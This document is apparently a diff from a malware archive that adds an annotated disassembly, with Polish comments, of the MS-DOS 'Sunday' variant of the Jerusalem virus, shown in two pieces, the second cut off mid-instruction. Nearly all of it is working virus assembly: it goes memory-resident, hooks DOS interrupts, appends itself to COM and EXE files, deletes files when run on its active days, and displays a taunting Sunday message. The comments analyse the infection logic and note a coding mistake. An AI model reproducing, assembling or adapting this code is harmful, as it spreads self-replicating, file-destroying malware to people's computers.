nazwy nosiciela ;9310 33 FF + MOV CX,7FFFh ;9312 B9 FF 7F + XOR AL,AL ;9315 32 C0 +L9317: REPNZ SCASB ;9317 F2 AE + CMP ES:[DI],AL ;9319 26 38 05 + LOOPNZ L9317 ;931C E0 F9 + MOV DX,DI ;pathname offset ;931E 8B D7 + ADD DX,3 ;9320 83 C2 03 + + MOV AX,4B00h ;Load & Execute nosiciela ;9323 B8 00 4B + PUSH ES ;9326 06 + POP DS ;pathname segment ;9327 1F + PUSH CS ;9328 0E + POP ES ;parameter block ;9329 07 + MOV BX,OFFSET L0035 ;parameter block ;932A BB 35 00 + PUSH DS ;932D 1E + PUSH ES ;932E 06 + PUSH AX ;932F 50 + PUSH BX ;9330 53 + PUSH CX ;9331 51 + PUSH DX ;9332 52 + MOV AH,2AH ;Get Date ;9333 B4 2A + INT 21H ;9335 CD 21 + MOV BYTE PTR CS:L000E,0 ;ptr aktywnosci wirusa ;9337 2E C6 06 0E 00 00 + CMP CX,1989 ;rok ;933D 81 F9 C5 07 + JZ L936F ;-> tak ;9341 74 2C + +; Mistake! Range for AL is 0 ..6 ! + + CMP AL,7 ;niedziela ? ;9343 3C 07 + JNZ L9350 ;-> nie ;9345 75 09 + INC BYTE PTR CS:L000E ;ptr aktywnosci wirusa ;9347 2E FE 06 0E 00 + JMP SHORT L936F ;934C EB 21 + + NOP ;934E 90 + NOP ;934F 90 + + ;<- to nie niedziela i rok nie 1989 +L9350: MOV AX,3508h ;Get int 8 ;9350 B8 08 35 + INT 21H ;9353 CD 21 + MOV CS:L0013,BX ;9355 2E 89 1E 13 00 + MOV CS:L0015,ES ;935A 2E 8C 06 15 00 + PUSH CS ;935F 0E + POP DS ;9360 1F + MOV WORD PTR L001F,32400 ;30 minut ;9361 C7 06 1F 00 90 7E + MOV AX,2508h ;Set int 8 ;9367 B8 08 25 + MOV DX,OFFSET L0216 ;936A BA 16 02 + INT 21H ;936D CD 21 +L936F: POP DX ;936F 5A + POP CX ;9370 59 + POP BX ;9371 5B + POP AX ;9372 58 + POP ES ;9373 07 + POP DS ;9374 1F + PUSHF ;9375 9C + CALL DWORD PTR CS:L0017 ;old int 21h (run) ;9376 2E FF 1E 17 00 + PUSH DS ;937B 1E + POP ES ;937C 07 + MOV AH,49H ;Free allocated memory ;937D B4 49 + INT 21H ;937F CD 21 + MOV AH,4DH ;Get Return code of child proc ;9381 B4 4D + INT 21H ;9383 CD 21 + MOV AH,31H ;Keep process ;9385 B4 31 + MOV DX,OFFSET L065F ;adres konca ;9387 BA 5F 06 + MOV CL,4 ;na paragrafy ;938A B1 04 + SHR DX,CL ;938C D3 EA + ADD DX,10h ;zaokraglenie ;938E 83 C2 10 + INT 21H ;9391 CD 21 + +;----------------------------------------------- +; Wlasna obsluga int 24h +;----------------------------------------------- +L0213: XOR AX,AX ;9393 33 C0 + IRET ;9395 CF + +;================================================================ +; Nowa obsluga int 8 +;---------------------------------------------------------------- +L0216: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;9396 2E 80 3E 0E 00 01 + JNZ L93CC ;-> to nie sobota ;939C 75 2E + CMP WORD PTR CS:L001F,0 ;939E 2E 83 3E 1F 00 00 + JNZ L93C7 ;-> jeszcze mamy czas ;93A4 75 21 + PUSH AX ;93A6 50 + PUSH BX ;93A7 53 + PUSH SI ;93A8 56 + MOV AH,0EH ; ;93A9 B4 0E + MOV BL,1FH ;atrybut ;93AB B3 1F + LEA SI,L0251 ;'Today is SunDay...' ;93AD 8D 36 51 02 +L93B1: MOV AL,CS:[SI] ;znak ;93B1 2E 8A 04 + CMP AL,'$' ;koniec ? ;93B4 3C 24 + JZ L93BD ;-> tak ;93B6 74 05 + INT 10H ;93B8 CD 10 + INC SI ;93BA 46 + JMP SHORT L93B1 ;93BB EB F4 + +L93BD: MOV WORD PTR CS:L001F,32400 ;reset licznika na 30min;93BD 2E C7 06 1F 00 90 7E + POP SI ;93C4 5E + POP BX ;93C5 5B + POP AX ;93C6 58 +L93C7: DEC WORD PTR CS:L001F ;licznik zwloki ;93C7 2E FF 0E 1F 00 +L93CC: JMP DWORD PTR CS:L0013 ;oryginal int 8 ;93CC 2E FF 2E 13 00 + +L0251 DB 'Today is SunDay! Why do you work so hard?',LF,CR + DB 'All work and no play make you a dull boy!',LF,CR + DB "Come on ! Let's go out and have some fun!$" + +;================================================================ +; Nowa obsluga int 21h +;---------------------------------------------------------------- +L02D2: PUSHF ;9452 9C + CMP AH,0FFH ;czy to pytanie o wirusa ? ;9453 80 FC FF + JNZ L945D ;-> nie ;9456 75 05 + MOV AX,0400h ;sygnalizacja obecnosci ;9458 B8 00 04 + POPF ;945B 9D + IRET ;945C CF + +L945D: CMP AH,0DDH ;uruchomienie nosiciela COM ? ;945D 80 FC DD + JZ L9470 ;-> tak ;9460 74 0E + CMP AX,4B00h ;Load & Execute ? ;9462 3D 00 4B + JNZ L946A ;-> nie, przezroczystosc ;9465 75 03 + JMP SHORT L949E ;-> tak ;9467 EB 35 + + NOP ;9469 90 + +L946A: POPF ;946A 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;946B 2E FF 2E 17 00 + +L9470: POP AX ;<- 0DDh, uruchom nosiciela COM ;9470 58 + POP AX ;9471 58 + MOV AX,0100h ;IP ;9472 B8 00 01 + MOV CS:L000A,AX ;9475 2E A3 0A 00 + POP AX ;CS ;9479 58 + MOV CS:L000C,AX ;947A 2E A3 0C 00 + REPZ MOVSB ;przeslanie programu na wirusa ;947E F3 A4 + POPF ;9480 9D + MOV AX,CS:L000F ;? ;9481 2E A1 0F 00 + JMP DWORD PTR CS:L000A ;9485 2E FF 2E 0A 00 + + ;<- uruchamianie programu w fazie aktywnosci +L948A: XOR CX,CX ;948A 33 C9 + MOV AX,4301h ;Set file attributes ;948C B8 01 43 + INT 21H ;948F CD 21 + MOV AH,41H ;Delete Directory Entry ;9491 B4 41 + INT 21H ;9493 CD 21 + MOV AX,4B00h ;Load & Execute ;9495 B8 00 4B + POPF ;9498 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;9499 2E FF 2E 17 00 + + ;<- uruchamianie programu +L949E: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;949E 2E 80 3E 0E 00 01 + JZ L948A ;-> aktywny ;94A4 74 E4 + MOV WORD PTR CS:L0070,0FFFFh ;File handle ;94A6 2E C7 06 70 00 FF FF + MOV WORD PTR CS:L008F,0 ;94AD 2E C7 06 8F 00 00 00 + MOV CS:L0080,DX ;path do programu ;94B4 2E 89 16 80 00 + MOV CS:L0082,DS ;94B9 2E 8C 1E 82 00 + PUSH AX ;94BE 50 + PUSH BX ;94BF 53 + PUSH CX ;94C0 51 + PUSH DX ;94C1 52 + PUSH SI ;94C2 56 + PUSH DI ;94C3 57 + PUSH DS ;94C4 1E + PUSH ES ;94C5 06 + CLD ;94C6 FC + MOV DI,DX ;94C7 8B FA + XOR DL,DL ;aktualny drive ;94C9 32 D2 + CMP BYTE PTR [DI+1],':' ;czy path z drive ? ;94CB 80 7D 01 3A + JNZ L94D6 ;-> nie, aktualny ;94CF 75 05 + MOV DL,[DI] ;94D1 8A 15 + AND DL,1FH ;na numer drive ;94D3 80 E2 1F +L94D6: MOV AH,36H ;Get Disk Free Space ;94D6 B4 36 + INT 21H ;94D8 CD 21 + CMP AX,0FFFFh ;94DA 3D FF FF + JNZ L94E2 ;-> drive number OK ;94DD 75 03 +L94DF: JMP L9768 ;<- drive number invalid ;94DF E9 86 02 + +L94E2: MUL BX ;* ;94E2 F7 E3 + MUL CX ;* ;94E4 F7 E1 + OR DX,DX ;94E6 0B D2 + JNZ L94EF ;-> ponad 64 KB wolne ;94E8 75 05 + CMP AX,OFFSET L065F ;=1631=dlugosc wirusa ;94EA 3D 5F 06 + JB L94DF ;94ED 72 F0 +L94EF: MOV DX,CS:L0080 ;path do programu ;94EF 2E 8B 16 80 00 + PUSH DS ;94F4 1E + POP ES ;94F5 07 + XOR AL,AL ;poszukiwanie konca ;94F6 32 C0 + MOV CX,41h ;94F8 B9 41 00 + REPNZ SCASB ;94FB F2 AE + MOV SI,CS:L0080 ;zamiana na duze litery ;94FD 2E 8B 36 80 00 +L9502: MOV AL,[SI] ;9502 8A 04 + OR AL,AL ;9504 0A C0 + JZ L9516 ;9506 74 0E + CMP AL,61H ;'a' ;9508 3C 61 + JB L9513 ;950A 72 07 + CMP AL,7AH ;'z' ;950C 3C 7A + JA L9513 ;950E 77 03 + SUB BYTE PTR [SI],20H ;' ' ;9510 80 2C 20 +L9513: INC SI ;9513 46 + JMP SHORT L9502 ;9514 EB EC + +L9516: MOV CX,0Bh ;czy to command ? ;9516 B9 0B 00 + SUB SI,CX ;9519 2B F1 + MOV DI,OFFSET L0084 ;'command.com' ;951B BF 84 00 + PUSH CS ;951E 0E + POP ES ;951F 07 + MOV CX,0Bh ;9520 B9 0B 00 + REPZ CMPSB ;9523 F3 A6 + JNZ L952A ;-> nie ;9525 75 03 + JMP L9768 ;-> tak, odpuszczamy ;9527 E9 3E 02 + +L952A: MOV AX,4300h ;Get File Attributes ;952A B8 00 43 + INT 21H ;952D CD 21 + JB L9536 ;952F 72 05 + MOV CS:L0072,CX ;atrybut zarazanego zbioru ;9531 2E 89 0E 72 00 +L9536: JB L955D ;9536 72 25 + XOR AL,AL ;znacznik zbioru COM ;9538 32 C0 + MOV CS:L004E,AL ;0=COM, 1=EXE ;953A 2E A2 4E 00 + PUSH DS ;szukamy konca nazwy ;953E 1E + POP ES ;953F 07 + MOV DI,DX ;9540 8B FA + MOV CX,41h ;9542 B9 41 00 + REPNZ SCASB ;9545 F2 AE + CMP BYTE PTR [DI-2],4DH ;'M'-ostatnia litera ;9547 80 7D FE 4D + JZ L9558 ;-> tak, COM ;954B 74 0B + CMP BYTE PTR [DI-2],6DH ;'m' ;954D 80 7D FE 6D + JZ L9558 ;-> tak, com ;9551 74 05 + INC BYTE PTR CS:L004E ;<- EXE ;9553 2E FE 06 4E 00 +L9558: MOV AX,3D00h ;Open Handle ;9558 B8 00 3D + INT 21H ;955B CD 21 +L955D: JB L95B9 ;955D 72 5A + MOV CS:L0070,AX ;File handle ;955F 2E A3 70 00 + MOV BX,AX ;9563 8B D8 + MOV AX,4202h ;Move file ptr EOF+offs ;9565 B8 02 42 + MOV CX,0FFFFh ;-5 (piec ostatnich bajtow) ;9568 B9 FF FF + MOV DX,0FFFBh ;956B BA FB FF + INT 21H ;956E CD 21 + JB L955D ;9570 72 EB + ADD AX,5 ;+5 bajtow sygnatury ;9572 05 05 00 + MOV CS:L0011,AX ;dlugosc programu oryginalna ;9575 2E A3 11 00 + MOV CX,5 ;dlugosc sygnatury ;9579 B9 05 00 + MOV DX,OFFSET L006B ;bufor na sygnature ;957C BA 6B 00 + MOV AX,CS ;957F 8C C8 + MOV DS,AX ;9581 8E D8 + MOV ES,AX ;9583 8E C0 + MOV AH,3FH ;Read Handle ;9585 B4 3F + INT 21H ;9587 CD 21 + MOV DI,DX ;przeczytana sygnatura ;9589 8B FA + MOV SI,OFFSET L0005 ;wzorzec sygnatury ;958B BE 05 00 + REPZ CMPSB ;958E F3 A6 + JNZ L9599 ;-> jeszcze nie zarazony ;9590 75 07 + MOV AH,3EH ;Close Handle ;9592 B4 3E + INT 21H ;9594 CD 21 + JMP L9768 ;9596 E9 CF 01 + + ;<----- zarazanie zbioru +L9599: MOV AX,3524h ;Get int 24h ;9599 B8 24 35 + INT 21H ;959C CD 21 + MOV L001B,BX ;959E 89 1E 1B 00 + MOV L001D,ES ;95A2 8C 06 1D 00 + MOV DX,OFFSET L0213 ;L9393 ;95A6 BA 13 02 + MOV AX,2524h ;Set int 24h ;95A9 B8 24 25 + INT 21H ;95AC CD 21 + + LDS DX,DWORD PTR L0080 ;ptr na path ;95AE C5 16 80 00 + XOR CX,CX ;95B2 33 C9 + MOV AX,4301h ;Set File attributes ;95B4 B8 01 43 + INT 21H ;95B7 CD 21 +L95B9: JB L95F6 ;95B9 72 3B + MOV BX,CS:L0070 ;File handle ;95BB 2E 8B 1E 70 00 + MOV AH,3EH ;Close Handle ;95C0 B4 3E + INT 21H ;95C2 CD 21 + MOV WORD PTR CS:L0070,0FFFFh ;File handle ;95C4 2E C7 06 70 00 FF FF + MOV AX,3D02h ;Open Handle R/W ;95CB B8 02 3D + INT 21H ;95CE CD 21 + JB L95F6 ;95D0 72 24 + MOV CS:L0070,AX ;File handle ;95D2 2E A3 70 00 + MOV AX,CS ;95D6 8C C8 + MOV DS,AX ;95D8 8E D8 + MOV ES,AX ;95DA 8E C0 + MOV BX,L0070 ;File handle ;95DC 8B 1E 70 00 + MOV AX,5700h ;Get File Date/Time ;95E0 B8 00 57 + INT 21H ;95E3 CD 21 + MOV L0074,DX ;95E5 89 16 74 00 + MOV L0076,CX ;95E9 89 0E 76 00 + MOV AX,4200h ;Move file ptr BOF+offs ;95ED B8 00 42 + XOR CX,CX ;95F0 33 C9 + MOV DX,CX ;95F2 8B D1 + INT 21H ;95F4 CD 21 +L95F6: JB L9636 ;95F6 72 3E + CMP BYTE PTR L004E,0 ;0=COM, 1=EXE ;95F8 80 3E 4E 00 00 + JZ L9603 ;95FD 74 04 + JMP SHORT L965C ;95FF EB 5B + + NOP ;9601 90 + NOP ;9602 90 + + ;<----- Zarazenie COM'a +L9603: MOV BX,1000h ;zadanie 64KB bufora pamieci ;9603 BB 00 10 + MOV AH,48H ;allocate memory ;9606 B4 48 + INT 21H ;9608 CD 21 + JNB L9617 ;-> powiodlo sie ;960A 73 0B + MOV AH,3EH ;Close Handle ;960C B4 3E + MOV BX,L0070 ;File handle ;960E 8B 1E 70 00 + INT 21H ;9612 CD 21 + JMP L9768 ;9614 E9 51 01 + +L9617: INC WORD PTR L008F ;9617 FF 06 8F 00 + MOV ES,AX ;nowy blok pamieci ;961B 8E C0 + XOR SI,SI ;961D 33 F6 + MOV DI,SI ;961F 8B FE + MOV CX,OFFSET L065F ;9621 B9 5F 06 + REPZ MOVSB ;przepisanie do bufora ;9624 F3 A4 + + MOV DX,DI ;pierwsze wolne miejsce ;9626 8B D7 + MOV CX,L0011 ;dlugosc programu oryginalna ;9628 8B 0E 11 00 + MOV BX,L0070 ;File handle ;962C 8B 1E 70 00 + PUSH ES ;9630 06 + POP DS ;9631 1F + MOV AH,3FH ;Read Handle ;9632 B4 3F + INT 21H ;9634 CD 21 +L9636: JB L9657 ;9636 72 1F + ADD DI,CX ;na poczatek zbioru ;9638 03 F9 + XOR CX,CX ;963A 33 C9 + MOV DX,CX ;963C 8B D1 + MOV AX,4200h ;Move file ptr BOF+offs ;963E B8 00 42 + INT 21H ;9641 CD 21 + MOV SI,OFFSET L0005 ;dopisanie ogonka ;9643 BE 05 00 + MOV CX,5 ;9646 B9 05 00 + PUSH DS ;9649 1E + PUSH CS ;964A 0E + POP DS ;964B 1F + REPZ MOVSB ;964C F3 A4 + POP DS ;964E 1F + MOV CX,DI ;nowa dlugosc programu ;964F 8B CF + XOR DX,DX ;bufor z wynikowym programem ;9651 33 D2 + MOV AH,40H ;Write Handle ;9653 B4 40 + INT 21H ;9655 CD 21 +L9657: JB L9666 ;9657 72 0D + JMP L9723 ;9659 E9 C7 00 + + ;<----- Zarazenie EXE'ca +L965C: MOV CX,1Ch ;EXE file header - dlugosc ;965C B9 1C 00 + MOV DX,OFFSET L004F ; - bufor ;965F BA 4F 00 + MOV AH,3FH ;Read Handle ;9662 B4 3F + INT 21H ;9664 CD 21 +L9666: JB L96B2 ;9666 72 4A + MOV WORD PTR L0061,1984h ;suma kontrolna ;9668 C7 06 61 00 84 19 + MOV AX,L005D ;SS ;966E A1 5D 00 + MOV L0045,AX ;9671 A3 45 00 + MOV AX,L005F ;SP ;9674 A1 5F 00 + MOV L0043,AX ;9677 A3 43 00 + MOV AX,L0063 ;IP ;967A A1 63 00 + MOV L0047,AX ;967D A3 47 00 + MOV AX,L0065 ;CS ;9680 A1 65 00 + MOV L0049,AX ;9683 A3 49 00 + MOV AX,L0053 ;sile size - pages ;9686 A1 53 00 + CMP WORD PTR L0051,0 ;last page bytes ;9689 83 3E 51 00 00 + JZ L9691 ;968E 74 01 + DEC AX ;9690 48 +L9691: MUL WORD PTR L0078 ;* ;9691 F7 26 78 00 + ADD AX,L0051 ;+last page bytes ;9695 03 06 51 00 + ADC DX,0 ;9699 83 D2 00 + ADD AX,0Fh ;zaokraglenie ;969C 05 0F 00 + ADC DX,0 ;969F 83 D2 00 + AND AX,0FFF0h ;96A2 25 F0 FF + MOV L007C,AX ;96A5 A3 7C 00 + MOV L007E,DX ;96A8 89 16 7E 00 + ADD AX,OFFSET L0664 ;dlugosc z sygnatura ;96AC 05 64 06 + ADC DX,0 ;96AF 83 D2 00 +L96B2: JB L96EE ;96B2 72 3A + DIV WORD PTR L0078 ;bytes per page ;96B4 F7 36 78 00 + OR DX,DX ;czy jest reszta ? ;96B8 0B D2 + JZ L96BD ;-> nie ;96BA 74 01 + INC AX ;<- jest reszta ;96BC 40 +L96BD: MOV L0053,AX ;pages per file ;96BD A3 53 00 + MOV L0051,DX ;last page bytes ;96C0 89 16 51 00 + MOV AX,L007C ;nowa dlugosc calosci ;96C4 A1 7C 00 + MOV DX,L007E ;96C7 8B 16 7E 00 + DIV WORD PTR L007A ;na paragrafy ;96CB F7 36 7A 00 + SUB AX,L0057 ;header size ;96CF 2B 06 57 00 + MOV L0065,AX ;CS wirusa ;96D3 A3 65 00 + MOV WORD PTR L0063,OFFSET L00C4 ;IP wirusa ;96D6 C7 06 63 00 C4 00 + MOV L005D,AX ;SS wirusa ;96DC A3 5D 00 + MOV WORD PTR L005F,OFFSET L065D ;SP wirusa ;96DF C7 06 5F 00 5D 06 + XOR CX,CX ;96E5 33 C9 + MOV DX,CX ;96E7 8B D1 + MOV AX,4200h ;Move file ptr BOF+offs ;96E9 B8 00 42 + INT 21H ;96EC CD 21 +L96EE: JB L96FA ;96EE 72 0A + MOV CX,1Ch ;zapis zmodyf. headera ;96F0 B9 1C 00 + MOV DX,OFFSET L004F ;96F3 BA 4F 00 + MOV AH,40H ;write handle ;96F6 B4 40 + INT 21H ;96F8 CD 21 +L96FA: JB L970D ;96FA 72 11 + CMP AX,CX ;96FC 3B C1 + JNZ L9723 ;-> nie cale poszlo ;96FE 75 23 + MOV DX,L007C ;nowa dlugosc zbioru ;9700 8B 16 7C 00 + MOV CX,L007E ;9704 8B 0E 7E 00 + MOV AX,4200h ;Move file ptr BOF+offs ;9708 B8 00 42 + INT 21H ;970B CD 21 +L970D: JB L9723 ;970D 72 14 + XOR DX,DX ;970F 33 D2 + MOV CX,065Fh ;9711 B9 5F 06 + MOV AH,40H ;Write Handle ;9714 B4 40 + INT 21H ;9716 CD 21 + MOV CX,5 ;9718 B9 05 00 + LEA DX,L0005 ;971B 8D 16 05 00 + MOV AH,40H ;Write Handle ;971F B4 40 + INT 21H ;9721 CD 21 + + ;<----- wspolny koniec +L9723: CMP WORD PTR CS:L008F,0 ;znacznik zajecia bloku ;9723 2E 83 3E 8F 00 00 + JZ L972F ;9729 74 04 + MOV AH,49H ;Free allocated memory ;972B B4 49 + INT 21H ;972D CD 21 +L972F: CMP WORD PTR CS:L0070,-1 ;File handle ;972F 2E 83 3E 70 00 FF + JZ L9768 ;-> nie otwarty ;9735 74 31 + MOV BX,CS:L0070 ;File handle ;9737 2E 8B 1E 70 00 + MOV DX,CS:L0074 ;973C 2E 8B 16 74 00 + MOV CX,CS:L0076 ;9741 2E 8B 0E 76 00 + MOV AX,5701h ;Set File Time/Date ;9746 B8 01 57 + INT 21H ;9749 CD 21 + MOV AH,3EH ;Close Handle ;974B B4 3E + INT 21H ;974D CD 21 + PUSH CS ;974F 0E + POP DS ;9750 1F + LDS DX,DWORD PTR L0080 ;ptr nazwy zbioru ;9751 C5 16 80 00 + MOV CX,CS:L0072 ;atry zarazanego zbioru ;9755 2E 8B 0E 72 00 + MOV AX,4301h ;Set File Attributes ;975A B8 01 43 + INT 21H ;975D CD 21 + LEA DX,L001B ;975F 8D 16 1B 00 + MOV AX,2524h ;Set int 24h vector ;9763 B8 24 25 + INT 21H ;9766 CD 21 +L9768: POP ES ;9768 07 + POP DS ;9769 1F + POP DI ;976A 5F + POP SI ;976B 5E + POP DX ;976C 5A + POP CX ;976D 59 + POP BX ;976E 5B + POP AX ;976F 58 + POPF ;9770 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;9771 2E FF 2E 17 00 + +L05F6 dw 03FCh ;<- adres wektora int ff ;9776 FC 03 + dw 0 ;9778 00 00 + + ;<------ stos + db 0 ;977A 00 + + dw 0 ;977B 00 00 + dw 0 ;977D 00 00 + dw 0 ;977F 00 00 + dw 0 ;9781 00 00 + dw 0 ;9783 00 00 + dw 0 ;9785 00 00 + dw 0 ;9787 00 00 + dw 0 ;9789 00 00 + dw 0 ;978B 00 00 + dw 0 ;978D 00 00 + dw 0 ;978F 00 00 + dw 0 ;9791 00 00 + dw 0 ;9793 00 00 + dw 0 ;9795 00 00 + dw 0 ;9797 00 00 + dw 0 ;9799 00 00 + dw 0 ;979B 00 00 + dw 0 ;979D 00 00 + dw 0 ;979F 00 00 + dw 0 ;97A1 00 00 + dw 0 ;97A3 00 00 + dw 0 ;97A5 00 00 + dw 0 ;97A7 00 00 + dw 156Ch ;97A9 6C 15 + dw 1261h ;97AB 61 12 + dw 2524h ;97AD 24 25 + dw 0005h ;97AF 05 00 + dw 0020h ;97B1 20 00 + dw 04EBh ;97B3 EB 04 + dw 0006h ;97B5 06 00 + dw 156Ch ;97B7 6C 15 + dw 2508h ;97B9 08 25 + dw 0FEA5h ;97BB A5 FE + dw 07BCh ;97BD BC 07 + dw 0216h ;97BF 16 02 + dw 065Eh ;97C1 5E 06 + dw 156Ch ;97C3 6C 15 + dw 0C89h ;97C5 89 0C + dw 012Fh ;97C7 2F 01 + dw 7F04h ;97C9 04 7F + dw 0075h ;97CB 75 00 + dw 065Eh ;97CD 5E 06 + dw 5A1Dh ;97CF 1D 5A + dw 0 ;97D1 00 00 + dw 9301h ;97D3 01 93 + dw 0BA6h ;97D5 A6 0B + dw 0213h ;97D7 13 02 + dw 0C89h ;97D9 89 0C + dw 0F202h ;97DB 02 F2 +L065D dw 2700h ;szczyt stosu ;97DD 00 27 + +L065F DB 0C8H,0F7h,0E1h,0EEh,0E7h ;97DF C8 F7 E1 EE E7 +L0664 label byte +S9180 ENDS + + END L9244 + diff --git a/MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst b/MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst new file mode 100644 index 00000000..9bfc41d7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst @@ -0,0 +1,727 @@ +; COM - na poczatku +; EXE - na koncu +; rozpoznaje wg nazwy (co nie COM = EXE) +;------- +; aktywacja w niedziele roku roznego od 1989 +; procedury niszczacej +;------- +; doniesienia co 30 minut +; ale nigdy nie wlaczone +;------- +; Nie zaraza COMMAND.COM'a +;------- + +LF EQU 0AH +CR EQU 0DH + +;INITIAL VALUES : CS:IP 0918:00C4 +; SS:SP 0918:065D + +;---------------- +; <- tutaj cialo programu +;---------------- + +S9180 SEGMENT STACK + ASSUME DS:S9180, SS:S9180 ,CS:S9180 ,ES:S9180 +L9180: jmp L0095 ;L9215 ;9180 E9 92 00 + + db 73h,55h ;'sU' ;9183 73 55 + + ;<- wzorzec sygnatury zarazenia +L0005 DB 0C8H,0F7h,0E1h,0EEh,0E7h ;9185 C8 F7 E1 EE E7 + +L000A dw 100h ;IP nosiciela COM ;918A 00 01 +L000C dw 1905h ;CS nosiciela COM ;918C 05 19 + +L000E db 0 ;ptr aktywnosci wirusa ;918E 00 +L000F dw 0 ;918F 00 00 +L0011 dw 9374h ;dlugosc programu oryginalna ;9191 74 93 + +L0013 dw 0FEA5h ;old int 8 ;9193 A5 +L0015 dw 0F000h ;9195 00 +L0017 dw 1460h ;old int 21h ;9197 60 14 +L0019 dw 025Bh ;9199 5B 02 +L001B dw 0556h ;old int 24h ;919B 56 05 +L001D dw 0BA6h ;919D A6 0B + +L001F dw 32400 ;30 minut zwloki ;919F 90 7E + dw 0 ;91A1 00 00 + dw 0 ;91A3 00 00 + dw 0 ;91A5 00 00 + dw 0 ;91A7 00 00 + dw 0 ;91A9 00 00 + dw 0 ;91AB 00 00 + dw 0E800h ;91AD 00 E8 + dw 5F06h ;91AF 06 5F + +L0031 dw 0C89h ;adres bloku wirusa ;91B1 89 0C +L0033 dw 80h ;wielkosc bloku wirusa (para) ;91B3 80 00 + + ;<----- Parameter Block +L0035 dw 0 ;Environment ;91B5 00 00 + dw 80h ;<- command line ;91B7 80 00 +L0039 dw 0C89h ; Segment ;91B9 89 0C + dw 5Ch ;<- FCB-1 ;91BB 5C 00 +L003D dw 0C89h ; Segment ;91BD 89 0C + dw 6Ch ;<- FCB-2 ;91BF 6C 00 +L0041 dw 0C89h ; Segment ;91C1 89 0C + +L0043 dw 0800h ;SP nosiciela ;91C3 00 08 +L0045 dw 0A58h ;rel segment stosu nosiciela ;91C5 58 0A + +L0047 dw 3D73h ;IP nosiciela ;91C7 73 3D +L0049 dw 0 ;CS nosiciela (rel) ;91C9 00 00 + + ;pierwsze 3 bajty wektora int ff +L004B dw 0F000h ;91CB 00 F0 +L004D db 46h ;91CD 46 + +L004E db 1 ;0=COM, 1=EXE ;91CE 01 + + ;<- bufor na poczatek zbioru +L004F db 'MZ' ;91CF 4D 5A +L0051 dw 01E4h ;last page bytes ;91D1 E4 01 +L0053 dw 004Dh ;file size - pages ;91D3 4D 00 + dw 0004h ;91D5 04 00 +L0057 dw 0020h ;header size (para) ;91D7 20 00 + dw 01C1h ;91D9 C1 01 + dw 0FFFFh ;91DB FF FF +L005D dw 0918h ;SS ;91DD 18 09 +L005F dw 065Dh ;SP ;91DF 5D 06 +L0061 dw 1984h ;suma kontrolna ;91E1 84 19 +L0063 dw 00C4h ;IP ;91E3 C4 00 +L0065 dw 0918h ;CS ;91E5 18 09 + dw 001Eh ;91E7 1E 00 + dw 0000h ;91E9 00 00 + + ;<- bufor na 5 ostatnich bajtow zbioru +L006B db 0Ah,0,0FFh,0FFh,0FFh ;91EB 0A 00 FF FF FF + +L0070 dw 5 ;File handle ;91F0 05 00 +L0072 dw 20h ;atrybut zarazanego zbioru ;91F2 20 00 +L0074 dw 1031h ;91F4 31 10 +L0076 dw 0A337h ;91F6 37 A3 +L0078 dw 200h ;bytes/sector(page) ;91F8 00 02 +L007A dw 10h ;bytes/paragraph ;91FA 10 00 +L007C dw 9380h ;nowa dlugosc zbioru DWORD ;91FC 80 93 +L007E dw 0 ;91FD 00 00 + +L0080 dw 41B9h ;path nazwy programu - offset ;9200 B9 41 +L0082 dw 9B2Ah ; - segment ;9202 2A 9B + +L0084 db 'COMMAND.COM' ;9294 43 4F 4D 4D 41 4E 44 2E 43 4F 4D +L008F dw 0,0,0 ;929F 00 00 00 00 00 00 + +;================================================ +; <- Start wirusa zbiorow COM +;------------------------------------------------ +L0095: CLD ;9215 FC + MOV AH,0FFH ;kontrola rezydowania ;9216 B4 FF + INT 21H ;9218 CD 21 + CMP AH,0FFH ;921A 80 FC FF + JNB L9234 ;-> nie rezyduje ;921D 73 15 + CMP AH,4 ;921F 80 FC 04 + JB L9234 ;-> nie rezyduje ;9222 72 10 + ;<- wirus juz rezyduje + MOV AH,0DDH ;uruchom program ;9224 B4 DD + MOV DI,100h ;miejsce docelowe programu ;9226 BF 00 01 + MOV SI,OFFSET L065F ;9229 BE 5F 06 + ADD SI,DI ;miejsce aktualne programu ;922C 03 F7 + MOV CX,CS:[DI+11H] ;dlugosc programu oryginalna ;922E 2E 8B 4D 11 + INT 21H ;9232 CD 21 + +L9234: MOV AX,CS ;normalizacja segmentu ;9234 8C C8 + ADD AX,10h ;9236 05 10 00 + MOV SS,AX ;9239 8E D0 + MOV SP,OFFSET L065D ;923B BC 5D 06 + PUSH AX ;segment ;923E 50 + MOV AX,OFFSET L00C4 ;=L9244 ;923F B8 C4 00 + PUSH AX ;offset ;9242 50 + RETF ;9243 CB + +;================================================ +; <- Start wirusa zbioru EXE +;------------------------------------------------ +L00C4: +L9244: CLD ;9244 FC + PUSH ES ;<- PSP ;9245 06 + MOV CS:L0031,ES ;9246 2E 8C 06 31 00 + MOV CS:L0039,ES ;924B 2E 8C 06 39 00 + MOV CS:L003D,ES ;9250 2E 8C 06 3D 00 + MOV CS:L0041,ES ;9255 2E 8C 06 41 00 + MOV AX,ES ;segment poczatku pgm ;925A 8C C0 + ADD AX,10h ;925C 05 10 00 + ADD CS:L0049,AX ;relokowanie CS ;925F 2E 01 06 49 00 + ADD CS:L0045,AX ;relokowanie SS ;9264 2E 01 06 45 00 + MOV AH,0FFH ;czy juz rezyduje ? ;9269 B4 FF + INT 21H ;926B CD 21 + CMP AH,4 ;926D 80 FC 04 + JNZ L9282 ;-> jeszcze nie ;9270 75 10 + + POP ES ;<- uruchomienie pgm ;9272 07 + MOV SS,CS:L0045 ;inicjacja stosu ;9273 2E 8E 16 45 00 + MOV SP,CS:L0043 ;9278 2E 8B 26 43 00 + JMP DWORD PTR CS:L0047 ;uruchomienie nosiciela ;927D 2E FF 2E 47 00 + + ;<- zarezydowanie +L9282: XOR AX,AX ;9282 33 C0 + MOV ES,AX ;9284 8E C0 + MOV BX,03FCh ;int 0ffh ;9286 BB FC 03 + MOV AX,ES:[BX] ;9289 26 8B 07 + MOV CS:L004B,AX ;928C 2E A3 4B 00 + MOV AL,ES:[BX+2] ;9290 26 8A 47 02 + MOV CS:L004D,AL ;9294 2E A2 4D 00 + MOV WORD PTR ES:[BX],0A5F3h ;rep movsw ;9298 26 C7 07 F3 A5 + MOV 